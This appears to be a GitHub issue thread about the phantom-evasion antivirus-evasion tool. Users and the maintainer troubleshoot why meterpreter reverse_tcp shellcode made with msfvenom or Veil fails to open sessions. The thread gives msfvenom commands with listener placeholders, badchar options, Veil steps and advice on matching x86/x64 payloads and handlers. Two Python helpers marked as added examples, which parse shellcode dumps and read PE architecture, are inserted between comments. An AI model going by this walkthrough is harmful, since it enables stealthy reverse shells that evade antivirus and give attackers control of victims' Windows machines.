Comments (35)

anonymouz4 avatar anonymouz4 commented on May 27, 2024 1

Of course

from phantom-evasion.

anonymouz4 avatar anonymouz4 commented on May 27, 2024 1

@oddcod3 Works! The wrong badchars were the problem. Thanks for the help!

oddcod3 avatar oddcod3 commented on May 27, 2024

64 bit payloads are more efficient (1/66) as mentioned in the README.
For example use windows/x64/meterpreter/reverse_tcp as msfvenom payload with one of the Windows shellcode injection modules.

anonymouz4 avatar anonymouz4 commented on May 27, 2024

Only problem is that I couldn't get shellcode injection to work even on 32bit.
I generated win shellcode with
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f c > outfile
which gave me a file like

#some notes
"\xfc\x8d\....\k6s"
"\j2c\x20\...\x00";

and I merged all together and pasted all in one line like \xfc\x8d\k6s\j2c\x20\x00

Was that correct or is there my mistake?

oddcod3 avatar oddcod3 commented on May 27, 2024

Your shellcode contains badchars (like \x00 (string terminator in C), \x0a and \x0d).
To avoid the problem add to your msfvenom command: -b "/x00/x0a/x0b"
Or use directly the option msfvenom payload in phantom evasion, which automatically removes badchars from shellcode.

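An added example, not code from the phantom-evasion project or from anyone in this thread: it joins the string literals of a constructed msfvenom -f c style dump into one byte string and flags the badchars named above (\x00, \x0a, \x0d). It also shows how much of the buffer a C string consumer actually keeps once it reaches the first \x00, which is why a pasted buffer containing NUL bytes silently shrinks.

```python
import re

# Bytes the thread identifies as problematic when the shellcode is embedded
# in a C string template: NUL (string terminator), LF and CR.
BADCHARS = {0x00: "NUL", 0x0A: "LF", 0x0D: "CR"}

# Constructed sample in the msfvenom "-f c" layout. These are NOT real
# shellcode bytes; they only exercise the parser and the badchar check.
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0"
"\x41\x00\x0a\x51\x0d"
"\x56\x52\x65\x48";
'''

# One C string literal made only of \xHH escapes.
_STRING_LIT = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_c_shellcode(text: str) -> bytes:
    """Concatenate every "\\xHH..." literal in -f c output into raw bytes."""
    hex_bytes = []
    for literal in _STRING_LIT.findall(text):
        hex_bytes.extend(literal.split("\\x")[1:])
    return bytes(int(h, 16) for h in hex_bytes)


def find_badchars(code: bytes, badchars=BADCHARS) -> list:
    """Return (offset, byte_value, name) for every disallowed byte present."""
    return [(i, b, badchars[b]) for i, b in enumerate(code) if b in badchars]


def c_string_visible_length(code: bytes) -> int:
    """Bytes a strlen()-style consumer sees before the first NUL terminator."""
    nul = code.find(b"\x00")
    return len(code) if nul < 0 else nul


def to_one_line(code: bytes) -> str:
    """Re-emit the bytes as a single-line \\xHH string (the format pasted above)."""
    return "".join(f"\\x{b:02x}" for b in code)


if __name__ == "__main__":
    code = parse_c_shellcode(SAMPLE_C_OUTPUT)
    for off, b, name in find_badchars(code):
        print(f"offset {off}: 0x{b:02x} ({name})")
    print(f"{len(code)} bytes parsed, "
          f"{c_string_visible_length(code)} survive as a C string")
```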
anonymouz4 avatar anonymouz4 commented on May 27, 2024

As described in this issue, I can't use the option msfvenom payload in phantom evasion, because you can't add other options besides lhost/lport like PrependMigrate.

but I will try the shellcode method again

anonymouz4 avatar anonymouz4 commented on May 27, 2024

I have no luck.
No shellcode worked, the default meterpreter only worked partly.
The default meterpreter sends the initializer stage, but exits afterwards.

screens

oddcod3 avatar oddcod3 commented on May 27, 2024

Did you set the payload option in multi/handler correctly?
If you use a 64 bit payload, the listener must be aware of what kind of stages it will have to send once a connection has been established (x86 or x64 meterpreter stages).

oddcod3 avatar oddcod3 commented on May 27, 2024

It looks like you've used windows/x64/meterpreter/reverse_tcp as payload but on multi/handler you've set payload windows/meterpreter/reverse_tcp.

anonymouz4 avatar anonymouz4 commented on May 27, 2024

No, I've used the 32bit payload on both listener and sender.

The only time I ran into this same error was when I was testing the reverse_http payload with proxy, but besides that it either worked or didn't work at all.

But I think with a lot of testing I can figure this one out myself.

My main problem is a different one. It's how to use Metasploit as shellcode. When created and implemented like in my comments above, even with AV turned off, it just doesn't create the connection.
Has anyone even tested it with their own shellcode from msfvenom?

oddcod3 avatar oddcod3 commented on May 27, 2024

Could you paste here your msfvenom command used to generate the shellcode?
(Without lhost and lport information)

anonymouz4 avatar anonymouz4 commented on May 27, 2024

Already posted it above but here again:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0b" > outfile

onesentinel avatar onesentinel commented on May 27, 2024

@anonymouz4 same problem

onesentinel avatar onesentinel commented on May 27, 2024

Any updates on this?

usama7628674 avatar usama7628674 commented on May 27, 2024

@oddcod3 I used custom shellcode generated by veil and couldn't get any session back to meterpreter. Could you please check it?

oddcod3 avatar oddcod3 commented on May 27, 2024

@anonymouz4 I've made a mistake: not /x0b but /x0d

usama7628674 avatar usama7628674 commented on May 27, 2024

@oddcod3 I didn't use badchars while generating shellcode with veil. The badchars that I avoided were \x00\x0a\x0d

anonymouz4 avatar anonymouz4 commented on May 27, 2024

@oddcod3 Ok I will try this with /x0d and then get back to you

oddcod3 avatar oddcod3 commented on May 27, 2024

I'm testing now if I can reproduce the issue.
At the moment I've tested custom msfvenom x86 shellcode with compiling option x86 and I can establish a session without problem.
Are you all (@usama7628674 @anonymouz4 @onesentinel) aware that using an x86 shellcode requires compiling the executable for x86 architecture?

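An added example, not code from the project or from anyone in this thread: the mismatch oddcod3 describes is a three-way agreement between the architecture the executable was compiled for, the shellcode's architecture and the handler's payload. The check below reads the COFF Machine field from a PE header; build_fake_pe constructs a header-only image for the demo (not a runnable executable), and arch_matches assumes the Metasploit naming convention that 64 bit payload names contain "/x64/".

```python
import struct

# IMAGE_FILE_MACHINE values from the PE/COFF specification.
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64"}


def pe_machine(data: bytes) -> str:
    """Return 'x86' or 'x64' from a PE image's COFF header (ValueError if not PE)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return MACHINE_NAMES.get(machine, f"unknown(0x{machine:04x})")


def build_fake_pe(machine: int) -> bytes:
    """Constructed DOS stub + PE signature + COFF header only, for the demo."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff


def handler_arch(payload_name: str) -> str:
    """Assumed naming convention: windows/x64/... is x64, plain windows/... is x86."""
    return "x64" if "/x64/" in payload_name else "x86"


def arch_matches(exe: bytes, shellcode_arch: str, handler_payload: str) -> bool:
    """The thread's rule: exe arch, shellcode arch and handler arch must all agree."""
    return pe_machine(exe) == shellcode_arch == handler_arch(handler_payload)


if __name__ == "__main__":
    exe = build_fake_pe(0x014C)
    print(pe_machine(exe), arch_matches(exe, "x86", "windows/meterpreter/reverse_tcp"))
```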
usama7628674 avatar usama7628674 commented on May 27, 2024

@oddcod3 Here's how you can reproduce the issue:
clone and install veil from github
use ordnance
select payload rev_tcp
set badchars \x00\x0a\x0d
set other options lhost,lport
generate
Then copy and paste the shellcode in phantom-evasion
select architecture x64.
run the generated .exe in windows 10 v1803

anonymouz4 avatar anonymouz4 commented on May 27, 2024

@usama7628674 Are you sure payload rev_tcp isn't 32bit?

usama7628674 avatar usama7628674 commented on May 27, 2024

@anonymouz4 That's what I don't know. I'll ask the veil developer.

anonymouz4 avatar anonymouz4 commented on May 27, 2024

@usama7628674 I'm almost sure that that is the case here. Just use msfvenom to create the shellcode.

usama7628674 avatar usama7628674 commented on May 27, 2024

@anonymouz4 Maybe veil is generating 32 bit shellcode while I'm using x64 arch in phantom-evasion. I'll try x86 arch and see if it works or not.

oddcod3 avatar oddcod3 commented on May 27, 2024

Yes, as @anonymouz4 said, veil payloads are 32 bit; @usama7628674, with the x86 compiling option you'll see a session correctly established!

oddcod3 avatar oddcod3 commented on May 27, 2024

@anonymouz4 finally!! (I'm sorry for the typo!)

usama7628674 avatar usama7628674 commented on May 27, 2024

@oddcod3 Yeah I'm pretty sure now veil generates 32 bit shellcode

anonymouz4 avatar anonymouz4 commented on May 27, 2024

@oddcod3
I think I celebrated a little too early. It creates the connection but instantly dies.

And this time I'm 100% sure everything is on 32bit

usama7628674 avatar usama7628674 commented on May 27, 2024

@anonymouz4 try with veil and see if you sustain the connection permanently

anonymouz4 avatar anonymouz4 commented on May 27, 2024

@usama7628674 Maybe, but I'll need to invest a lot of time bc Veil isn't working yet for me. Every time I run the script it just says installing and finishes that with success. So I probably have to do it all manually.

usama7628674 avatar usama7628674 commented on May 27, 2024

@anonymouz4 You must install it using git clone method

anonymouz4 avatar anonymouz4 commented on May 27, 2024

@usama7628674 I did

usama7628674 avatar usama7628674 commented on May 27, 2024

@anonymouz4 What did you get after executing?

anonymouz4 avatar anonymouz4 commented on May 27, 2024

Has anyone achieved a working connection with 64bit shellcode?

My summary:
Veil:
Only supports 32bit shellcode (not tested, but prob. works)
msfvenom:
32bit connects but instantly dies. 64bit doesn't work at all

anonymouz4 avatar anonymouz4 commented on May 27, 2024

I will open a new issue and close this one to create an overview on this topic, bc everything here is a little unclear.
Just like a fresh start.
